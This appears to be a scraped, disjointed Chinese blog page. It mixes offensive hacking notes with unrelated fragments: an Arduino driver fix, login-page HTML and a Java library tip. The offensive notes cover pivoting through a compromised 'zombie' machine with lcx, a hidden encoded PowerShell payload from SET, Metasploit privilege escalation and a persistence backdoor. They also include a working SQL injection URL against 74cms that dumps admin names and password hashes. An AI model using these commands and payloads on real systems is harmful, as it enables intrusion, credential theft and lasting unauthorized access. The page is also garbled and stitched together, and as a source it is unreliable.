c:/Users/lcx.exe -slave kali.ip 8900 bb.bb.bbb.bb 80 lcx -m 2 -p1 8900 -p2 8000
<br />
内网结构: aaa.aa.aa.aa是肉鸡(windows) bbb.bb.bbb.bb是和肉鸡同一网段的目标服务器
我的机器 —- 攻击用公网服务器(kali) —- a肉鸡—–b目标服务器
将lcx.exe传上肉鸡去,执行第一条命令,此时肉鸡的动作:
我的机器 —- 攻击用公网服务器(kali) (:8900)<—- a肉鸡<–(:80)–>b目标服务器
a肉鸡连接kali的8900端口,并把b目标服务器的80端口打开给kali
然后在kali上执行第二条命令,此时的动作:
我的机器 <—- (:8000)–>攻击用公网服务器(kali) <—(:8900)–> a肉鸡<–(:80)–>b目标服务器
于是在我的机器上访问http://kali.ip:8000 即打开b目标服务器的80端口,即网页
回家再把两个版本的lcx发上来
use exploit/multi/handler set PAYLOAD (OS)/meterpreter/...
SET生成powershell:
setools 》social。。。 》1 设置HOST为metasploit服务器地址 PORT为不冲突的端口
肉鸡运行脚本:
powershell -noprofile -windowstyle hidden -noninteractive -EncodedCommand 加上SET生成的代码
提权
getsystem
持久后门:
run persistence -X -i 5 -p 2777 -r metasploit服务器地址
|
摘抄 先上一张beEF的界面图:” P I3 P( V” \2 p( N
|
如文中未特别声明转载请注明出自:http://www.metasploit.cn/
/usr/share/beef-xss/beef [13:24:43][!] Unable to load extension 'xssrays' [13:24:43][!] Unable to load extension 'admin_ui' [13:24:43][!] Unable to load extension 'network' [13:24:43][!] Unable to load extension 'events' [13:24:43][!] Unable to load extension 'autoloader' [13:24:43][!] Unable to load extension 'requester' [13:24:43][!] Unable to load extension 'dns' [13:24:43][!] Unable to load extension 'demos' [13:24:43][!] Unable to load extension 'ipec' [13:24:43][!] Unable to load extension 'social_engineering' [13:24:43][!] Unable to load extension 'proxy' [13:24:43][!] Unable to load extension 'console'cd /usr/share/beef ./beef -xIf you configure a password,try to restart msfconsole
API Fire Error: invalid byte sequence in US-ASCII in {:owner=>BeEF::Extension::AdminUI::API::Handler, :id=>17}.mount_handler() export LANG="en_US.UTF-8"
系统找不到指定文件
如果你使用的是精简版windows系统,安装Arduino驱动时,可能会遇到”系统找不到指定文件”这个问题,如下图:
这是因为精简版的window系统删掉了一些不常用的驱动信息引起的,解决方法如下:
1.首先打开C:\windows\inf\setupapi.dev.log
这个文件包含了有关即插即用设备和驱动程序安装的信息,当然它也记录你Arduino驱动安装失败的原因。
打开该文件,滚动到文件末尾附近,你可以看到如下信息:
正是这个文件缺失,致使你的Arduino驱动无法安装。
2.在 C:\Windows\System32\DriverStore\FileRepository\ 路径下,新建一个mdmcpq.inf_x86_neutral_********文件夹
每台电脑后面的标示不一样,*******具体是什么请参照上面setupapi.dev.log文件给出的提示信息。
例如,我这台电脑给出的信息为
C:\Windows\System32\DriverStore\FileRepository\mdmcpq.inf_x86_neutral_9f203c20b6f0dabd
根据该提示,我在C:\Windows\System32\DriverStore\FileRepository\ 路径下,建立了一个同名文件夹,如下
下载usber.sys放进去
关键词:
<meta http-equiv=”Content-Type” content=”text/html; charset=gb2312″ /><title>会员登录</title>
<meta name=”description” content=””>
<meta name=”keywords” content=””>
<meta http-equiv=”X-UA-Compatible” content=”IE=7″>
<link rel=”shortcut icon” href=”/favicon.ico” />
<meta name=”author” content=”骑士CMS” />
<meta name=”copyright” content=”74cms.com” />
<link href=”/templates/default1_blue/css/user.css” rel=”stylesheet” type=”text/css” />
<script src=”/templates/default1_blue/js/jquery.js” type=’text/javascript’ language=”javascript”></script>
<script type=”text/javascript”>
$(document).ready(function()
{
//
$(“#username”).focus(function(){
if ($(“#username”).val()==”用户名/邮箱/手机号”)
{
$(“#username”).val(”);
$(“#username”).css(“color”,””);
}
});
//
$(“.but80”).hover(function(){$(this).addClass(“but80_hover”)},function(){$(this).removeClass(“but80_hover”)});
//验证
exp:
http://demo.74cms.com/plus/ajax_common.php?act=hotword&query=%E9%8C%A6%27union+/*!50000SeLect*/+1,group_concat%28admin_name,0x3a,pwd,0x3a,pwd_hash%29,3+from+qs_admin%23
爆出来的密文破不了
airmon-ng wlan0mon stop service network-manager restart
网上说是因为包重复了,但我是因为导入包的位置不对,不能导入到Java资源下的lib,需要导入到WEB—INF下
